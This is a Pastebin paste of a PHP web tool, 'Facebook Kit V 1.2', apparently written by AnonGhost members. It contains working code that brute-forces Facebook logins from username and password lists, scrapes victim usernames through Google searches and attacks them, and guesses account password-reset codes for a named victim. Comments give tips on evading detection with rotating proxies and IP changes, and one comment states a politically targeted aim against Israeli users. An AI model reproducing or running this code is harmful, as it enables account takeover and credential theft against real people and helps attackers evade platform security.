Kyfx

[PHP] Facebook Kit V 1.2

May 14th, 2015
515
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.02 KB | None | 0 0
  1. <?php
  2. session_start();
  3.  
  4. error_reporting(E_ERROR | E_PARSE);
  5. @ini_set("max_execution_time",0);
  6. @set_time_limit(0); #No Fx in SafeMode
  7. @ignore_user_abort(TRUE);
  8. @set_magic_quotes_runtime(0);
  9. // Use your mind to escape Facebook Security \!/
  10. // Don't Allow Cookies in your browser (Use priv8 browsing)
  11. // Change your IP and DNS each 2 seconds and your Job will be Great °_°
  12. // GreetZ To : All AnonGhost MemberZ \!/
  13. // You can edit this script but don't forget to mention the authors °_°
  14. // Tutorial Video: https://www.youtube.com/watch?v=66a_wOwOT48
  15.  
  16. echo '
  17. <html>
  18. <title>Facebook Kit</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
  19. <body style="background-color:black;">
  20. <style type="text/css">
  21. body {
  22. background:
  23. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  24. url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
  25. background-color: #000000;
  26. }
  27. a{
  28. text-decoration:none;
  29. border:1px solid #12549c;
  30. border-radius:5px;
  31. background-color:black;
  32. color:white;
  33. font-family:Arial;
  34. font-size:17;
  35. box-shadow: 0px 0px 12px #21a0ed;
  36. }
  37. #r{
  38. border-bottom:1px solid #12549c;
  39. }
  40. </style>
  41.  
  42. <head>
  43. </body>
  44. </html>
  45. <center><font color="white" face="Orbitron" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
  46. ';
  47.  
  48. echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly9oYWNrLXRvdXQuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE0LzAyL0ZhY2Vib29rLnBuZyIvPg==").'</center>';
  49.  
  50. echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
  51.  
  52. echo '</font></b></div><br></center>';
  53.  
  54. ?>
  55. <div id="det" align="center">
  56.  
  57. </div>
  58. </center>
  59. <div id="r" align="center">
  60. <a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>">&nbsp;Home&nbsp;</a></font>
  61. <a href="?action=baipas">&nbsp;FB Brute Force&nbsp;</a></font>
  62. <a href="?action=brut">&nbsp;FB Ghost Catcher&nbsp;</a></font>
  63. <a href="?action=crack">&nbsp;FB Reset Code&nbsp;</a></font>
  64. <a href="?action=passgen">&nbsp;Reset Code Generator&nbsp;</a></font>
  65. <a href="?action=idgen">&nbsp;FB ID Generator&nbsp;</a></font>
  66. <a href="?action=graph">&nbsp;FB ID Checker&nbsp;</a></font>
  67. <audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
  68. </div><br>
  69. <?php
  70.  
  71. if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
  72. @error_reporting(0);
  73. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  74. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  75. $validCharNumber = strlen($validCharacters);
  76. $len = 10;
  77. $result = "";
  78.  
  79. for ($i = 0; $i < $len; $i++) {
  80. $index = mt_rand(0, $validCharNumber - 1);
  81. $result .= $validCharacters[$index];
  82. }
  83.  
  84. return $result;
  85. }
  86.  
  87. echo'
  88. <style>
  89. textarea {
  90. resize:none;
  91. color: #1975FF ;
  92. border:1px solid #1975FF ;
  93. border-left: 4px solid #1975FF ;
  94. }
  95. input {
  96. color: ##33CCFF;
  97. border:1px dotted #33CCFF;
  98. }
  99. </style>
  100. <p><center><font face="impact" color="White" size="4">Facebook ID Generator
  101. </center><center></font><br>
  102. <title>Facebook ID Generator</title>
  103. <form method="post">
  104. <font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
  105. <input type="submit" value="Generate" name="fbmailgen">
  106. </form><br>';
  107.  
  108. $len = $_POST['len'];
  109. $nr = $_POST['nr'];
  110. if ($_POST['fbmailgen']) {
  111. echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
  112. for ($x=0; $x < $nr ; $x++){
  113. echo "10000" . getRandomString() . "\r\n";
  114. }
  115. echo "</textarea><br>";
  116. echo "
  117. <br>
  118. <b>
  119. </b>
  120. <br>
  121. ";
  122. }
  123. }
  124. if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
  125. @error_reporting(0);
  126. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  127. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  128. $validCharNumber = strlen($validCharacters);
  129. $len = 6;
  130. $result = "";
  131.  
  132. for ($i = 0; $i < $len; $i++) {
  133. $index = mt_rand(0, $validCharNumber - 1);
  134. $result .= $validCharacters[$index];
  135. }
  136.  
  137. return $result;
  138. }
  139.  
  140. echo'
  141. <style>
  142. textarea {
  143. resize:none;
  144. color: #1975FF ;
  145. border:1px solid #1975FF ;
  146. border-left: 4px solid #1975FF ;
  147. }
  148. input {
  149. color: ##33CCFF;
  150. border:1px dotted #33CCFF;
  151. }
  152. </style>
  153. <p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
  154. </center><center><br>
  155. <title>Facebook Reset Code Generator</title>
  156. <form method="post">
  157. <font color="white">Number Of Reset Codes : &nbsp;&nbsp;<input type="text" name="nr"><br><br></font>
  158. <input type="submit" value="Generate" name="fbmailgen">
  159. </form><br>';
  160. $len = $_POST['len'];
  161. $nr = $_POST['nr'];
  162. if ($_POST['fbmailgen']) {
  163. echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
  164. for ($x=0; $x < $nr ; $x++){
  165. echo getRandomString() . "\r\n";
  166. }
  167. echo "</textarea><br>";
  168. echo "
  169. <br>
  170. <b>
  171. </b>
  172. <br>
  173. ";
  174. }
  175.  
  176. }
  177.  
  178. if(isset($_GET['action']) && $_GET['action'] == 'brut'){
  179.  
  180. echo"
  181. <style>
  182. textarea {
  183. resize:none;
  184. color: #1975FF ;
  185. border:1px solid #1975FF ;
  186. border-left: 4px solid #1975FF ;
  187. }
  188. input {
  189. color: ##33CCFF;
  190. border:1px dotted #33CCFF;
  191. }
  192. select {
  193. color: ##33CCFF;
  194. border:1px dotted #33CCFF;
  195. }
  196. </style>
  197. <title>F4c3b00k Gh0sT</title>
  198. <form method='POST'>
  199. <center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by n0name-hax0r & Mauritania Attacker</font><br></center><br>
  200. <center>
  201. <center><font face='arial' size='1' color='red'>Server</font><br></center>
  202. <select name=country><br><br>
  203. <option value='Choose Country'>Choose The Country</option>
  204. <option value='site:fr-fr.facebook.com/'>France</option>
  205. <option value='site:ar-ar.facebook.com/'>Arab Countries</option>
  206. <option value='site:es-es.facebook.com/'>Spain</option>
  207. <option value='site:tr-tr.facebook.com/'>Turkey</option>
  208. <option value='site:de-de.facebook.com/'>Germany</option>
  209. <option value='site:pt-pt.facebook.com/'>Portugual</option>
  210. <option value='site:it-it.facebook.com/'>Italy</option>
  211. <option value='site:hi-in.facebook.com/'>India</option>
  212. <option value='site:sr-rs.facebook.com/'>Serbia</option>
  213. <option value='site:el-gr.facebook.com/'>Greece</option>
  214. <option value='site:he-il.facebook.com/'>Israel</option>
  215. <option value='site:id-id.facebook.com/'>Indonesia</option>
  216. <option value='site:ru-ru.facebook.com/'>Russia</option>
  217. <option value='site:nl-nl.facebook.com/'>Netherlands</option>
  218. <option value='site:bg-bg.facebook.com/'>Bulgaria</option>
  219. <option value='site:mk-mk.facebook.com/'>Macedonia</option>
  220. <option value='site:uk-ua.facebook.com/'>Ukraine</option>
  221. <option value='site:zh-cn.facebook.com/'>China</option>
  222. </select><br><br>
  223. </center>
  224. <center>
  225. <input type='text' name='victim' placeholder='Victim Name'><br><br>
  226. <textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
  227. <input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
  228. </form>
  229. <center>
  230. <font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
  231. ";
  232. set_time_limit(0);
  233. ini_set('memory_limit', '64M');
  234. header('Content-Type: text/html; charset=UTF-8');
  235. function letItBy(){ ob_flush(); flush(); }
  236.  
  237. $country = $_POST['country'];
  238. $victim = $_POST['victim'];
  239. $bing = "{$country}"."{$victim}";
  240. $password = explode("\r\n",$_POST['pass']);
  241.  
  242. //Function that gets google urls
  243.  
  244. function google_that($query, $page=1)
  245. {
  246. $resultPerPage=8;
  247. $start = $page*$resultPerPage;
  248. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  249. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  250. if(isset($resultFromGoogle['responseStatus'])) {
  251. if($resultFromGoogle['responseStatus'] != '200') return false;
  252. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  253. else return $resultFromGoogle['responseData']['results'];
  254. }
  255. else
  256. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  257. }
  258. function http_get($url, $safemode = false){
  259. if($safemode === true) sleep(1);
  260. $im = curl_init($url);
  261. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  262. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  263. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  264. curl_setopt($im, CURLOPT_HEADER, 0);
  265. return curl_exec($im);
  266. curl_close();
  267. }
  268. function brute($user,$pass){
  269. $ch = curl_init();
  270. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  271. curl_setopt($ch, CURLOPT_HEADER, 0);
  272. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  273. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  274. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  275. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  276. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  277. $login = curl_exec($ch);
  278. //print_r($login);
  279. $check = (eregi('class="s t i u"',$login)) ? true:false;
  280. if($check == true){
  281. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  282. }else{
  283. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  284. }
  285. }
  286.  
  287.  
  288. if(isset($_POST['start'])){
  289.  
  290. letItBy();
  291. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  292. $googleResult = google_that($bing, $googlePage);
  293. if(!$googleResult) {
  294. echo 'Finished scanning.';
  295.  
  296. break;
  297. }
  298.  
  299. // Gets the username of victim
  300.  
  301. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  302.  
  303. $result = $googleResult[$victim]['unescapedUrl'];
  304. if($country == "site:fr-fr.facebook.com/"){
  305. $rsss = str_replace("https://fr-fr.facebook.com/","",$result);
  306. }
  307. elseif($country == "site:ar-ar.facebook.com/"){
  308. $rsss = str_replace("https://ar-ar.facebook.com/","",$result);
  309. }
  310. elseif($country == "site:es-es.facebook.com/"){
  311. $rsss = str_replace("https://es-es.facebook.com/","",$result);
  312. }
  313. elseif($country == "site:tr-tr.facebook.com/"){
  314. $rsss = str_replace("https://tr-tr.facebook.com/","",$result);
  315. }
  316. elseif($country == "site:de-de.facebook.com/"){
  317. $rsss = str_replace("https://de-de.facebook.com/","",$result);
  318. }
  319. elseif($country == "site:pt-pt.facebook.com/"){
  320. $rsss = str_replace("https://pt-pt.facebook.com/","",$result);
  321. }
  322. elseif($country == "site:it-it.facebook.com/"){
  323. $rsss = str_replace("https://it-it.facebook.com/","",$result);
  324. }
  325. elseif($country == "site:hi-in.facebook.com/"){
  326. $rsss = str_replace("https://hi-in.facebook.com/","",$result);
  327. }
  328. elseif($country == "site:zh-cn.facebook.com/"){
  329. $rsss = str_replace("https://zh-cn.facebook.com/","",$result);
  330. }
  331. elseif($country == "site:sr-rs.facebook.com/"){
  332. $rsss = str_replace("https://sr-rs.facebook.com/","",$result);
  333. }
  334. elseif($country == "site:el-gr.facebook.com/"){
  335. $rsss = str_replace("https://el-gr.facebook.com/","",$result);
  336. }
  337. elseif($country == "site:he-il.facebook.com/"){
  338. $rsss = str_replace("https://he-il.facebook.com/","",$result);
  339. }
  340. elseif($country == "site:id-id.facebook.com/"){
  341. $rsss = str_replace("https://id-id.facebook.com/","",$result);
  342. }
  343. elseif($country == "site:ru-ru.facebook.com/"){
  344. $rsss = str_replace("https://ru-ru.facebook.com/","",$result);
  345. }
  346. elseif($country == "site:nl-nl.facebook.com/"){
  347. $rsss = str_replace("https://nl-nl.facebook.com/","",$result);
  348. }
  349. elseif($country == "site:bg-bg.facebook.com/"){
  350. $rsss = str_replace("https://bg-bg.facebook.com/","",$result);
  351. }
  352. elseif($country == "site:mk-mk.facebook.com/"){
  353. $rsss = str_replace("https://mk-mk.facebook.com/","",$result);
  354. }
  355. elseif($country == "site:uk-ua.facebook.com/"){
  356. $rsss = str_replace("https://uk-ua.facebook.com/","",$result);
  357. }
  358. $users = explode("?", $rsss);
  359. $users = $users[0];
  360.  
  361. //Bruteforce Function
  362.  
  363. foreach($password as $pass)
  364. {
  365.  
  366. echo brute($users,$pass);
  367. }
  368. }
  369. }
  370. }
  371. @system("del cookie.txt"); //Delete cookies command for win server.
  372. @system("rm cookie.txt"); // Delete cookies command for linux server.
  373. }
  374. if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
  375.  
  376. ob_start();
  377. @set_time_limit(0);
  378. #################################################
  379. #---------------------------------------------- #
  380. # Facebook Brute Force 2014 #
  381. #Coded by : Mauritania Attacker&Noname-Haxor #
  382. #Greetz : All AnonGhost Members #
  383. #This Tool Is For Erasing Israel in Fb #
  384. # --------------------------------------------- #
  385. #################################################
  386.  
  387. echo "
  388. <head>
  389. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  390. <form method='POST'>
  391. <title>Facebook Brute Force 2014</title>
  392. </head>
  393. <style>
  394. textarea {
  395. resize:none;
  396. color: #1975FF ;
  397. border:1px solid #1975FF ;
  398. border-left: 4px solid #1975FF ;
  399. }
  400. input {
  401. color: ##33CCFF;
  402. border:1px dotted #33CCFF;
  403. }
  404. </style>";
  405.  
  406. echo "
  407. <body text='#FFFFFF' >
  408. <center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor </center></font><br>
  409. <p dir='ltr' align='center'>
  410. <textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
  411. <textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
  412. <br>
  413. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
  414. if(isset($_POST['scan'])){
  415. #To Put Proxy SOCKS V5
  416. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  417. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  418. function brute($user,$pass){
  419. $ch = curl_init();
  420. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  421. curl_setopt($ch, CURLOPT_HEADER, 0);
  422. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  423. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  424. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  425. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  426. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  427. $login = curl_exec($ch);
  428. //print_r($login);
  429. $check = (eregi('class="s t i u"',$login)) ? true:false;
  430. if($check == true){
  431. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  432. }else{
  433. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  434. }
  435. }
  436.  
  437.  
  438.  
  439.  
  440. $username = explode("\n", $_POST['username']);
  441. $password = explode("\n", $_POST['password']);
  442.  
  443.  
  444. foreach($username as $users) {
  445. $users = @trim($users);
  446. foreach($password as $pass) {
  447. $pass = @trim($pass);
  448. echo brute($users,$pass);
  449. }
  450.  
  451. }
  452. @system("del cookie.txt"); //Delete cookies command for win server.
  453. @system("rm cookie.txt"); // Delete cookies command for linux server.
  454.  
  455. }
  456. echo"<br>
  457. <br>
  458. <br>
  459. <br>
  460. ";
  461. }
  462. if(isset($_GET['action']) && $_GET['action'] == 'crack'){
  463.  
  464.  
  465. /*
  466. [+] Facebook Code Security Cracker
  467. [+] Coded By : Mauritania Attacker
  468. [+] GreetZ : All AnonGhost MemberZ
  469. [+] FuCk Priv888888888888888888888
  470.  
  471.  
  472. ~~HACKING IS ART OF EXPLOITATION~~
  473.  
  474. <3 <3 <3 I'm not educated , I hate school , Hacking is my life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
  475.  
  476. // How to use: Restore your victim account and better choose the email option :p , and the rest is to use your mind \!/
  477. I suggest you to use an auto rotating proxy after each 2 minutes so you won't get banned :D , i've bypassed already the captcha
  478. security and cookies ,so facebook won't let you try many attempts so proxy is the solution !
  479.  
  480. you still can add a proxy socks v5 option in Curl only two lines :
  481.  
  482. curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  483. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  484.  
  485. You can edit my script and try to develop it more if you have some ideas you are free , but don't forget the Copyright wkwkwkwkwkwk xd <3
  486.  
  487. Sharing is Caring \!/
  488.  
  489. Sorry my english is bad and i'm lazy xD !
  490. */
  491.  
  492. @set_time_limit(0);
  493. echo "<form method='POST'>
  494. <title>Facebook Code Security Cracker > By Mauritania Attacker</title>
  495. <style>
  496. /* Rounded Corners */
  497. #ghost {
  498. resize:none;
  499. color: #1975FF ;
  500. border:1px solid #1975FF ;
  501. border-left: 4px solid #1975FF ;
  502. height: 250px;
  503. width: 200px; }
  504. input {
  505. /* INPUTS */
  506. border: 1px solid #12549c;
  507. }
  508. </style>
  509. <center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
  510. <center><input type='text' name='target' placeholder='Victim'></center><br>
  511. <center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
  512. <p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
  513. </form>";
  514. $target=$_POST['target'];
  515. $user = explode("\r\n", $_POST['code']);
  516. if($_POST['scan'])
  517. {
  518. foreach($user as $code)
  519. {
  520. // Curl Function ^_^
  521. $ch = curl_init();
  522. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
  523. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  524. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  525. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  526. curl_setopt($ch, CURLOPT_HEADER, 1);
  527. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
  528.  
  529. $check = curl_exec($ch);
  530. if(eregi("password_new", $check)) //Keyword Good Response ^_^
  531. {
  532. echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
  533. }
  534. else
  535. {
  536. echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
  537. }
  538. curl_close($ch);
  539. }
  540. }
  541. @system("del cookie.txt"); //Delete cookies command for win server.
  542. @system("rm cookie.txt"); // Delete cookies command for linux server.
  543. }
  544.  
  545. echo "</center><center>";
  546.  
  547.  
  548.  
  549.  
  550. ob_end_flush();
  551.  
  552.  
  553. echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
  554.  
  555. if(isset($_GET['action']) && $_GET['action'] == 'graph'){
  556.  
  557.  
  558.  
  559. @set_time_limit(0);
  560. echo "<form method='POST'>
  561. <title>Facebook ID's Checker By Mauritania Attacker</title>
  562. <style>
  563. /* Rounded Corners */
  564. #ghost {
  565. resize:none;
  566. color: #1975FF ;
  567. border:1px solid #1975FF ;
  568. border-left: 4px solid #1975FF ;
  569. height: 250px;
  570. width: 200px; }
  571. input {
  572. /* INPUTS */
  573. border: 1px solid #12549c;
  574. }
  575. </style>
  576. <center><font color='White' size='4' face='impact'>Facebook ID's Checker By Mauritania Attacker</center><br>
  577. <center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
  578. <p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
  579. </form>";
  580.  
  581. $user = explode("\r\n", $_POST['code']);
  582. if($_POST['scan'])
  583. {
  584. foreach($user as $code)
  585. {
  586. // Curl Function ^_^
  587. $ch = curl_init();
  588. curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
  589. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  590. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  591. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  592. curl_setopt($ch, CURLOPT_HEADER, 1);
  593. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  594.  
  595. $check = curl_exec($ch);
  596. if(eregi("username", $check)) //Keyword Good Response ^_^
  597. {
  598. echo "<font face='Tahoma' size='2' color='green'>{$code} => ID IS CORRECT ^_^ </font><br>";
  599. }
  600. else
  601. {
  602. echo "<font face='Tahoma' size='2' color='red'>{$code} => ID IS FALSE :(...</font><br>";
  603. }
  604. curl_close($ch);
  605. }
  606. }
  607. @system("del cookie.txt"); //Delete cookies command for win server.
  608. @system("rm cookie.txt"); // Delete cookies command for linux server.
  609. }
  610.  
  611. echo "</center><center>";
  612.  
  613. ob_end_flush();
  614.  
  615. echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
  616. ?>
Add Comment
Please, Sign In to add comment